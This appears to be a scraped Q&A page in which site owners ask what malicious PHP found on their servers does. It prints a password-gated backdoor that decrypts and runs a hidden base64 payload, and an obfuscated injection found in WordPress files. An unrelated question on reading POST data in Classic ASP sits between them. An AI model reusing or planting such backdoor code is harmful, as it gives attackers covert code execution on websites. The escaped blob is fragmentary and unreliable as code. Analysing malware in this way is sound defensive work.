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
tyv1Lr0=
'));
//$l___l_ = $data
//$l__l_ = $input
//$l____l_ = $i and $func
//If the form was submitted, load from post, otherwise check for a cookie and use that.
$input=isset($_POST['input'])?$_POST['input']:(isset($_COOKIE['input'])?$_COOKIE['input']:NULL);
if($input!==NULL)
{
/*
This is a modified hash function, it looks like the md5 hash with extra characters on the end
I notice (because of the string reverse function in there) that when the input string is a palindrome
the extra characters on the end of the output string match the beginning of the output string e.g.
input string = '12321'
md5 = 8542516f8870173d7d1daba1daaaf0a1
modified md5 = 8542516f8870173d7d1daba1daaaf0a185425
The end of the modified md5 (85425) matches the beginning. Don't know how relevant that is.
*/
$input = md5($input).substr(md5(strrev($input)), 0, strlen($input));
//Note 15185 is the length of the data string above after base64 decoding.
for($i = 0; $i < 15185; $i++)
{
//Take the ascii # of the data char at each position and subtract the ascii # of the char
//at the same position in the hashed input. Loop over 256 and return as a char
$data[$i]=chr(( ord($data[$i])-ord($input[$i]))%256);
//Then add that char to the end of the hashed input string
$input.=$data[$i];
}
//$data has been modified at this point, if gzip suceeds in decompressing it
if($data=#gzinflate($data))
{
//If we made a post save it in a cookie
if(isset($_POST['input']))#setcookie('input', $_POST['input']);
//create a function from the unzipped data, unset used variables, and run the function.
$func=create_function('',$data);
unset($data,$input);
$func();
}
}?>
<form action="" method="post"><input type="text" name="input" value=""/><input type="submit" value=">"/></form>
So to summarize it looks like it takes your input, runs it through some md5 shenanigans, combines it with the de-base64'd block of data, unzips it, turns the result into a function, and runs it.
My question is why? Why not just take a text input and eval() it? What is this extra code giving the hacker that he couldn't do before? And is there any way I can see what's in the block of code? It looks like the input can't be plain php, but rather a string of gobbledegook that fits together with the data to create a valid zip file.
This code obfuscation is mainly done to hide the real activity from any researcher. Also, some tools can discover the malicious code if it's not obfuscated. To discover what's hidden behind the scenery, you could have dumped the $data var just before create_function was called. But you can't do that without knowing the incoming data from the hacker's input. If you really want to know, what's there, you can set up logging for the input data and wait until the hacker comes to the site.
Related
Read POST data in AJAX call
I have some Session values that I am constantly changing via Ajax calls. I can't seem to get a handle on the POST data to process it and set the values. What I am passing to it here is an array of strings like is shown in my code below. Here is where AJAX calls: var sessionValues = []; str = {"PID": "1", "Level": "Main", "MenuName": "Kitchen", "State": "CHECKED"} sessionValues.push(str); var postObj = {"sessionData": sessionValues}; $.ajax({ type: 'POST', data: {'data': postObj}, url: 'setSession.asp' }).done(function(response){ console.log(response); }) I have this working fine in a PHP version of the program but my ASP version is not grabbing the data. Here is my PHP ver and the ASP ver as best as I could convert it. <-- php setSession.php works fine --> $data = $_POST['data']; foreach ($data['sessionData'] as $key => $value) { $projectProduct = "1"; $level = $value["Level"]; $menuName = $value["MenuName"]; $state = $value["State"]; $_SESSION['PID:'.$projectProduct][$level][$menuName]['menu_state'] = $state; echo "[PID:".$projectProduct."][".$level."][".$menuName."][".$state."]<br>"; } 0 =>>>>> Array<br>[PID:1][Main][Kitchen][CHECKED] Here I want to do the same thing in ASP ' setSession.asp data = Request.Form("data") For Each part In data("sessionData") projectProduct = part("PID") level = part("Level") menuName = part("MenuName") state = part("State") Session("PID:" & projectProduct).Item(level).Item(menuName).Remove("menu_state") Session("PID:" & projectProduct).Item(level).Item(menuName).Add "menu_state", state response.write("[PID:" & projectProduct&"]["&level&"]["&menuName&"]["&state&"]<br>") Next outputs blank It looks like it never has any data but doesn't throw any errors. Am I reading the POST object correctly? [edit] Here is the RAW POST data captured from Fiddler: data%5BsessionData%5D%5B0%5D%5BPID%5D=1&data%5BsessionData%5D%5B0%5D%5BLevel%5D=Main&data%5BsessionData%5D%5B0%5D%5BMenuName%5D=Kitchen&data%5BsessionData%5D%5B0%5D%5BState%5D=CHECKED here I used a URL Decode on that string- data[sessionData][0][PID]=1&data[sessionData][0][Level]=Main Level Plan&data[sessionData][0][MenuName]=Kitchen&data[sessionData][0][State]=CHECKED This looks like I should be able to loop through the strings now by using For Each part In Request.Form("data[sessionData]") but nothing happens. I added a simple loop to look at the request.form and here is what it is seeing: for each x in Request.Form Response.Write(x) Next ' outputs -> data[sessionData][0][PID]data[sessionData][0][Level]data[sessionData][0][MenuName]data[sessionData][0][State] I guess what this comes down to is just reading through and processing that string correctly, or multiple if more than one is sent. Correct?
The RAW output definitely helps work out what is going on. What is happening is jQuery is translating the JSON structure into HTTP POST parameters but during the process, it creates some overly complex key names. If you break down the key value pairs you have something like data[sessionData][0][PID]=1 data[sessionData][0][Level]=Main Level Plan data[sessionData][0][MenuName]=Kitchen data[sessionData][0][State]=CHECKED As far as Classic ASP is concerned the this is just a collection of string key and value pairs and nothing more. The correct approach to work out what these keys are is to do what you have done in the question, but with some minor alternations. For Each x In Request.Form Response.Write(x) & "=" & Request.Form(x) & "<br />" Next Which when outputted as HTML will look similar to the break down shown above. Armed with the knowledge of what the keys are you should be able to reference them directly from the Request.Form() collection. Dim pid: pid = Request.Form("data[sessionData][0][PID]") Response.Write pid Output: 1
Malicious code found in WordPress theme files. What does it do?
I discovered this code inserted at the top of every single PHP file inside of an old, outdated WordPress installation. I want to figure out what this script was doing, but have been unable to decipher the main hidden code. Can someone with experience in these matters decrypt it? Thanks! <?php if (!isset($GLOBALS["anuna"])) { $ua = strtolower($_SERVER["HTTP_USER_AGENT"]); if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11"))) $GLOBALS["anuna"] = 1; } ?> <?php $nzujvbbqez = 'E{h%x5c%x7825)j{hnpd!opjudovg-%x5c%x7824]26%x5c%x7824-%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<x5c%x782f#)rrd%x5c%x83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y<X>b%x5c%x7825Z<#opo#>b{jt)!gj!<*2bd%x5c%x7euhA)3of>2bd%x5c%x7825!<5h%x5c%x78225%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tus66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5cc%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878284]364]6]234]342]58]24]311]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#73]y72]282#<!%x5c%x7825tjw!>!x5c%x7825%x5c%x787f!25ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpd8;0]=])0#)U!%x5c%x7827{**u%x5c%x7%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x7.3%x5c%x7860hA%x5c%x7827pd%x5c%x782525)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x55%x5c%x782f#0#%x5c%x782f*#npd%}#-#%x5c%x7824-%x5c%x7824-tusvd},;uqpuft%x5c%x7860>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyf5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5tcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x25%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x786<.fmjgA%x5c%x7827doj%x825-#jt0}Z;0]=]0#)2q%x5c%xx5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x78%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78ec%x7825!**X)ufttj%x5c%x7822)r.985:52985-t.98]K4]65]D8]86]y37827pd%x5c%x78256<pd%x5c%x7825w6Z6<]5]48]32M3]317]445]212]445]43]321]464]n)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x782so!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5cW~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2%x5c%x78b%x5c%x7825w:!>!%x5c27;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%xufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:5cq%x5c%x78257**^#zsfvr#27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSc%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%xc%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id1%x29%73", NULL); }IjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuv5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7ec%x787f%x5c%x787f%x5c%x787f%x5%x5c%x7825)ftpmdR6<*id%x5c%x78mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#7825l}S;2-u%x5c%x7825!-#2#%**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<]y74]256]y39]252]y83]2761"])))) { $GLOBALS["%x61%156%x75%156%x61"]=1; funx5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)%x7825zB%x5c%x7825z>!tussfw)%x5c%xu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c165%x3a%146%x21%76%x21%50%x5cction fjfgg($n){return 78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x76]277]y72]265]y39]271]y83]256]y78]248]y827!hmg%x5c%x7825!)!gj!<2,*qpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824doF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x561%154%x28%151%x6d%160%x6c%157%x6%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x785j:.2^,%x5c%x7825b:<!%x5c%x<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x78*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x78787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x57###7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x7x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5ce:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x782x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%k;opjudovg}%x5c%x7877825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x77825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j25!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf%x5c%x7825!*##>>X)!gjZ<#opo#>b%x533]65]y31]53]y6d]281]y43825<#762]67y]562]38y]572]48y]j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubx7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboep5h>#]y31]278]y3e]81]K78:56985:6197g:74787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822o]#%x5c%x782f*)323zbe!-#jt0*?]+^782f#00;quui#>.%x5c%x7825!<***f%x5c%x7946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQc%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{25)Rb%x5c%x7825))!gj!<*#cd1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%xj!|!*msv%x5c%x7825)}k~~~<ftm4-%x5c%x7824y7%x5c%x7824-%x5ce%x5c%x7825!osvufs!*!+A!>!{e%x5x7825)uqpuft%x5c%x7860msc%x7825>U<#16,47R57,27R]K5]53]Kc#<%x5c%x7825tp&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!x7825!<**3-j%x5c%x78%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]3x5c%x782f#%x5c%x7825#%x5c%x782f#mqnj!%x5c%x782f!#0#)idubn%x5c#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c#-%x5c%x7825tdz*Wsfuvso!%x5c%78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273fttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%xf!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;60%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%xc%x787f<u%x5c%x7825Vif((function_exists("%x6f%142%x5f%163%x74%141%x7%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%xz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4x5c%x78257>%x5c%x782f7&6|7**11x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5 c%x7825c5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825)dfyfR%x5c%x7827tfs%x54%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*#)tutjyf%x5c%x7860opjudovg)!gE#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]%x5c%x785cq%x5c%x7825)uoe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x!>!tus%x5c%x7860sfqmbdf)%x5c%4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x6<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]yq%x5c%x7825V<*#fopoV;hojepmsvd}+;!>!}%x5c%x7827;!4%145%x28%141%x72%162%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x78827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%xov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x77825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x78]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqchr(ord($n)-1);} 